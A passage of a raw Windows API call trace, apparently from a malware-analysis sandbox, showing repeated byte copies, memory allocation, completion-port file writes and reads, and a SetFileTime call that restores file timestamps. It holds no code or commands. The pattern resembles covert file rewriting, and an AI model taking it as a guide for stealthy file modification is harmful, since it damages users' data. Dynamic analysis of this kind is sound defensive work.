_Size=0x1 | out: _Dst=0x206b8c6) returned 0x206b8c6 [0077.227] memcpy (in: _Dst=0x206b8c7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c7) returned 0x206b8c7 [0077.227] memcpy (in: _Dst=0x206b8c8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c8) returned 0x206b8c8 [0077.227] memcpy (in: _Dst=0x206b8c9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c9) returned 0x206b8c9 [0077.227] memcpy (in: _Dst=0x206b8ca, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ca) returned 0x206b8ca [0077.227] memcpy (in: _Dst=0x206b8cb, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8cb) returned 0x206b8cb [0077.227] memcpy (in: _Dst=0x206b8cc, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8cc) returned 0x206b8cc [0077.227] memcpy (in: _Dst=0x206b8cd, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8cd) returned 0x206b8cd [0077.227] memcpy (in: _Dst=0x206b8ce, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ce) returned 0x206b8ce [0077.228] memcpy (in: _Dst=0x206b8cf, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8cf) returned 0x206b8cf [0077.228] memcpy (in: _Dst=0x206b8d0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d0) returned 0x206b8d0 [0077.228] memcpy (in: _Dst=0x206b8d1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d1) returned 0x206b8d1 [0077.228] memcpy (in: _Dst=0x206b8d2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d2) returned 0x206b8d2 [0077.228] memcpy (in: _Dst=0x206b8d3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d3) returned 0x206b8d3 [0077.228] memcpy (in: _Dst=0x206b8d4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d4) returned 0x206b8d4 [0077.228] memcpy (in: _Dst=0x206b8d5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d5) returned 0x206b8d5 [0077.228] memcpy (in: _Dst=0x206b8d6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d6) returned 0x206b8d6 [0077.228] memcpy (in: _Dst=0x206b8d7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d7) returned 0x206b8d7 [0077.228] memcpy (in: _Dst=0x206b8d8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d8) returned 0x206b8d8 [0077.228] memcpy (in: _Dst=0x206b8d9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8d9) returned 0x206b8d9 [0077.228] memcpy (in: _Dst=0x206b8da, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8da) returned 0x206b8da [0077.228] memcpy (in: _Dst=0x206b8db, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8db) returned 0x206b8db [0077.228] memcpy (in: _Dst=0x206b8dc, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8dc) returned 0x206b8dc [0077.228] memcpy (in: _Dst=0x206b8dd, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8dd) returned 0x206b8dd [0077.228] memcpy (in: _Dst=0x206b8de, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8de) returned 0x206b8de [0077.228] memcpy (in: _Dst=0x206b8df, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8df) returned 0x206b8df [0077.228] memcpy (in: _Dst=0x206b8e0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e0) returned 0x206b8e0 [0077.228] memcpy (in: _Dst=0x206b8e1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e1) returned 0x206b8e1 [0077.228] memcpy (in: _Dst=0x206b8e2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e2) returned 0x206b8e2 [0077.228] memcpy (in: _Dst=0x206b8e3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e3) returned 0x206b8e3 [0077.228] memcpy (in: _Dst=0x206b8e4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e4) returned 0x206b8e4 [0077.229] memcpy (in: _Dst=0x206b8e5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e5) returned 0x206b8e5 [0077.229] memcpy (in: _Dst=0x206b8e6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e6) returned 0x206b8e6 [0077.229] memcpy (in: _Dst=0x206b8e7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e7) returned 0x206b8e7 [0077.229] memcpy (in: _Dst=0x206b8e8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e8) returned 0x206b8e8 [0077.229] memcpy (in: _Dst=0x206b8e9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8e9) returned 0x206b8e9 [0077.229] memcpy (in: _Dst=0x206b8ea, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ea) returned 0x206b8ea [0077.229] memcpy (in: _Dst=0x206b8eb, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8eb) returned 0x206b8eb [0077.229] memcpy (in: _Dst=0x206b8ec, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ec) returned 0x206b8ec [0077.229] memcpy (in: _Dst=0x206b8ed, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ed) returned 0x206b8ed [0077.229] memcpy (in: _Dst=0x206b8ee, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ee) returned 0x206b8ee [0077.229] memcpy (in: _Dst=0x206b8ef, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ef) returned 0x206b8ef [0077.229] memcpy (in: _Dst=0x206b8f0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f0) returned 0x206b8f0 [0077.229] memcpy (in: _Dst=0x206b8f1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f1) returned 0x206b8f1 [0077.229] memcpy (in: _Dst=0x206b8f2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f2) returned 0x206b8f2 [0077.229] memcpy (in: _Dst=0x206b8f3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f3) returned 0x206b8f3 [0077.229] memcpy (in: _Dst=0x206b8f4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f4) returned 0x206b8f4 [0077.229] memcpy (in: _Dst=0x206b8f5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f5) returned 0x206b8f5 [0077.229] memcpy (in: _Dst=0x206b8f6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f6) returned 0x206b8f6 [0077.229] memcpy (in: _Dst=0x206b8f7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f7) returned 0x206b8f7 [0077.229] memcpy (in: _Dst=0x206b8f8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f8) returned 0x206b8f8 [0077.229] memcpy (in: _Dst=0x206b8f9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8f9) returned 0x206b8f9 [0077.230] memcpy (in: _Dst=0x206b8fa, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8fa) returned 0x206b8fa [0077.230] memcpy (in: _Dst=0x206b8fb, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8fb) returned 0x206b8fb [0077.230] memcpy (in: _Dst=0x206b8fc, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8fc) returned 0x206b8fc [0077.230] memcpy (in: _Dst=0x206b8fd, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8fd) returned 0x206b8fd [0077.230] memcpy (in: _Dst=0x206b8fe, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8fe) returned 0x206b8fe [0077.230] memcpy (in: _Dst=0x206b8ff, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ff) returned 0x206b8ff [0077.230] memcpy (in: _Dst=0x206b900, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b900) returned 0x206b900 [0077.230] memcpy (in: _Dst=0x206b901, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b901) returned 0x206b901 [0077.230] memcpy (in: _Dst=0x206b902, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b902) returned 0x206b902 [0077.230] memcpy (in: _Dst=0x206b903, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b903) returned 0x206b903 [0077.230] memcpy (in: _Dst=0x206b904, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b904) returned 0x206b904 [0077.230] memcpy (in: _Dst=0x206b905, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b905) returned 0x206b905 [0077.230] memcpy (in: _Dst=0x206b906, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b906) returned 0x206b906 [0077.230] memcpy (in: _Dst=0x206b907, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b907) returned 0x206b907 [0077.230] memcpy (in: _Dst=0x206b908, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b908) returned 0x206b908 [0077.230] memcpy (in: _Dst=0x206b909, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b909) returned 0x206b909 [0077.230] memcpy (in: _Dst=0x206b90a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b90a) returned 0x206b90a [0077.230] memcpy (in: _Dst=0x206b90b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b90b) returned 0x206b90b [0077.230] memcpy (in: _Dst=0x206b90c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b90c) returned 0x206b90c [0077.230] memcpy (in: _Dst=0x206b90d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b90d) returned 0x206b90d [0077.230] memcpy (in: _Dst=0x206b90e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b90e) returned 0x206b90e [0077.230] memcpy (in: _Dst=0x206b90f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b90f) returned 0x206b90f [0077.231] memcpy (in: _Dst=0x206b910, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b910) returned 0x206b910 [0077.231] memcpy (in: _Dst=0x206b911, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b911) returned 0x206b911 [0077.231] memcpy (in: _Dst=0x206b912, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b912) returned 0x206b912 [0077.231] memcpy (in: _Dst=0x206b913, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b913) returned 0x206b913 [0077.231] memcpy (in: _Dst=0x206b914, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b914) returned 0x206b914 [0077.231] memcpy (in: _Dst=0x206b915, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b915) returned 0x206b915 [0077.231] memcpy (in: _Dst=0x206b916, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b916) returned 0x206b916 [0077.231] memcpy (in: _Dst=0x206b917, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b917) returned 0x206b917 [0077.231] memcpy (in: _Dst=0x206b918, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b918) returned 0x206b918 [0077.231] memcpy (in: _Dst=0x206b919, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b919) returned 0x206b919 [0077.231] memcpy (in: _Dst=0x206b91a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b91a) returned 0x206b91a [0077.231] memcpy (in: _Dst=0x206b91b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b91b) returned 0x206b91b [0077.231] memcpy (in: _Dst=0x206b91c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b91c) returned 0x206b91c [0077.231] memcpy (in: _Dst=0x206b91d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b91d) returned 0x206b91d [0077.231] memcpy (in: _Dst=0x206b91e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b91e) returned 0x206b91e [0077.231] memcpy (in: _Dst=0x206b91f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b91f) returned 0x206b91f [0077.231] memcpy (in: _Dst=0x206b920, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b920) returned 0x206b920 [0077.231] memcpy (in: _Dst=0x206b921, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b921) returned 0x206b921 [0077.231] memcpy (in: _Dst=0x206b922, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b922) returned 0x206b922 [0077.231] memcpy (in: _Dst=0x206b923, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b923) returned 0x206b923 [0077.231] memcpy (in: _Dst=0x206b924, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b924) returned 0x206b924 [0077.232] memcpy (in: _Dst=0x206b925, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b925) returned 0x206b925 [0077.232] memcpy (in: _Dst=0x206b926, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b926) returned 0x206b926 [0077.232] memcpy (in: _Dst=0x206b927, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b927) returned 0x206b927 [0077.232] memcpy (in: _Dst=0x206b928, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b928) returned 0x206b928 [0077.232] memcpy (in: _Dst=0x206b929, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b929) returned 0x206b929 [0077.232] memcpy (in: _Dst=0x206b92a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b92a) returned 0x206b92a [0077.232] memcpy (in: _Dst=0x206b92b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b92b) returned 0x206b92b [0077.232] memcpy (in: _Dst=0x206b92c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b92c) returned 0x206b92c [0077.232] memcpy (in: _Dst=0x206b92d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b92d) returned 0x206b92d [0077.232] memcpy (in: _Dst=0x206b92e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b92e) returned 0x206b92e [0077.232] memcpy (in: _Dst=0x206b92f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b92f) returned 0x206b92f [0077.232] memcpy (in: _Dst=0x206b930, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b930) returned 0x206b930 [0077.232] memcpy (in: _Dst=0x206b931, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b931) returned 0x206b931 [0077.232] memcpy (in: _Dst=0x206b932, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b932) returned 0x206b932 [0077.232] memcpy (in: _Dst=0x206b933, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b933) returned 0x206b933 [0077.232] memcpy (in: _Dst=0x206b934, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b934) returned 0x206b934 [0077.232] memcpy (in: _Dst=0x206b935, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b935) returned 0x206b935 [0077.232] memcpy (in: _Dst=0x206b936, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b936) returned 0x206b936 [0077.232] memcpy (in: _Dst=0x206b937, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b937) returned 0x206b937 [0077.232] memcpy (in: _Dst=0x206b938, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b938) returned 0x206b938 [0077.232] memcpy (in: _Dst=0x206b939, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b939) returned 0x206b939 [0077.232] memcpy (in: _Dst=0x206b93a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b93a) returned 0x206b93a [0077.233] memcpy (in: _Dst=0x206b93b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b93b) returned 0x206b93b [0077.233] memcpy (in: _Dst=0x206b93c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b93c) returned 0x206b93c [0077.233] memcpy (in: _Dst=0x206b93d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b93d) returned 0x206b93d [0077.233] memcpy (in: _Dst=0x206b93e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b93e) returned 0x206b93e [0077.233] memcpy (in: _Dst=0x206b93f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b93f) returned 0x206b93f [0077.233] memcpy (in: _Dst=0x206b940, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b940) returned 0x206b940 [0077.233] memcpy (in: _Dst=0x206b941, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b941) returned 0x206b941 [0077.233] memcpy (in: _Dst=0x206b942, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b942) returned 0x206b942 [0077.233] memcpy (in: _Dst=0x206b943, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b943) returned 0x206b943 [0077.233] memcpy (in: _Dst=0x206b944, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b944) returned 0x206b944 [0077.233] memcpy (in: _Dst=0x206b945, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b945) returned 0x206b945 [0077.233] memcpy (in: _Dst=0x206b946, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b946) returned 0x206b946 [0077.233] memcpy (in: _Dst=0x206b947, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b947) returned 0x206b947 [0077.233] memcpy (in: _Dst=0x206b948, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b948) returned 0x206b948 [0077.233] memcpy (in: _Dst=0x206b949, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b949) returned 0x206b949 [0077.233] memcpy (in: _Dst=0x206b94a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b94a) returned 0x206b94a [0077.233] memcpy (in: _Dst=0x206b94b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b94b) returned 0x206b94b [0077.233] memcpy (in: _Dst=0x206b94c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b94c) returned 0x206b94c [0077.233] memcpy (in: _Dst=0x206b94d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b94d) returned 0x206b94d [0077.233] memcpy (in: _Dst=0x206b94e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b94e) returned 0x206b94e [0077.233] memcpy (in: _Dst=0x206b94f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b94f) returned 0x206b94f [0077.234] memcpy (in: _Dst=0x206b950, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b950) returned 0x206b950 [0077.234] memcpy (in: _Dst=0x206b951, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b951) returned 0x206b951 [0077.234] memcpy (in: _Dst=0x206b952, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b952) returned 0x206b952 [0077.234] memcpy (in: _Dst=0x206b953, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b953) returned 0x206b953 [0077.234] memcpy (in: _Dst=0x206b954, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b954) returned 0x206b954 [0077.234] memcpy (in: _Dst=0x206b955, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b955) returned 0x206b955 [0077.234] memcpy (in: _Dst=0x206b956, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b956) returned 0x206b956 [0077.234] memcpy (in: _Dst=0x206b957, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b957) returned 0x206b957 [0077.234] memcpy (in: _Dst=0x206b958, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b958) returned 0x206b958 [0077.234] memcpy (in: _Dst=0x206b959, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b959) returned 0x206b959 [0077.234] memcpy (in: _Dst=0x206b95a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b95a) returned 0x206b95a [0077.234] memcpy (in: _Dst=0x206b95b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b95b) returned 0x206b95b [0077.234] memcpy (in: _Dst=0x206b95c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b95c) returned 0x206b95c [0077.234] memcpy (in: _Dst=0x206b95d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b95d) returned 0x206b95d [0077.234] memcpy (in: _Dst=0x206b95e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b95e) returned 0x206b95e [0077.234] memcpy (in: _Dst=0x206b95f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b95f) returned 0x206b95f [0077.234] memcpy (in: _Dst=0x206b960, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b960) returned 0x206b960 [0077.234] memcpy (in: _Dst=0x206b961, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b961) returned 0x206b961 [0077.234] memcpy (in: _Dst=0x206b962, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b962) returned 0x206b962 [0077.234] memcpy (in: _Dst=0x206b963, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b963) returned 0x206b963 [0077.235] memcpy (in: _Dst=0x206b964, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b964) returned 0x206b964 [0077.235] memcpy (in: _Dst=0x206b965, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b965) returned 0x206b965 [0077.235] memcpy (in: _Dst=0x206b966, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b966) returned 0x206b966 [0077.235] memcpy (in: _Dst=0x206b967, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b967) returned 0x206b967 [0077.235] memcpy (in: _Dst=0x206b968, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b968) returned 0x206b968 [0077.235] memcpy (in: _Dst=0x206b969, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b969) returned 0x206b969 [0077.235] memcpy (in: _Dst=0x206b96a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b96a) returned 0x206b96a [0077.235] memcpy (in: _Dst=0x206b96b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b96b) returned 0x206b96b [0077.235] memcpy (in: _Dst=0x206b96c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b96c) returned 0x206b96c [0077.235] memcpy (in: _Dst=0x206b96d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b96d) returned 0x206b96d [0077.235] memcpy (in: _Dst=0x206b96e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b96e) returned 0x206b96e [0077.235] memcpy (in: _Dst=0x206b96f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b96f) returned 0x206b96f [0077.235] memcpy (in: _Dst=0x206b970, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b970) returned 0x206b970 [0077.236] memcpy (in: _Dst=0x206b971, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b971) returned 0x206b971 [0077.236] memcpy (in: _Dst=0x206b972, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b972) returned 0x206b972 [0077.236] memcpy (in: _Dst=0x206b974, _Src=0x2e0fdc8, _Size=0x20 | out: _Dst=0x206b974) returned 0x206b974 [0077.236] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.236] memcpy (in: _Dst=0x2060778, _Src=0x206b894, _Size=0x100 | out: _Dst=0x2060778) returned 0x2060778 [0077.236] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.236] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.236] free (_Block=0x2060778) [0077.237] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.237] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.237] memcpy (in: _Dst=0x2062da0, _Src=0x2062eb8, _Size=0x100 | out: _Dst=0x2062da0) returned 0x2062da0 [0077.237] memcpy (in: _Dst=0x2062da0, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062da0) returned 0x2062da0 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x20ab8d0, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.237] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.238] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.238] free (_Block=0x2062da0) [0077.239] free (_Block=0x53fcc0) [0077.239] free (_Block=0x2062eb8) [0077.239] WriteFile (in: hFile=0x3b4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.240] GetLastError () returned 0x3e5 [0077.240] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.300] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.300] CloseHandle (hObject=0x3b4) returned 1 [0077.302] free (_Block=0x20ebb50) [0077.302] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.326] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.326] GetLastError () returned 0x3e5 [0077.326] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.343] ReadFile (in: hFile=0x3c0, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, 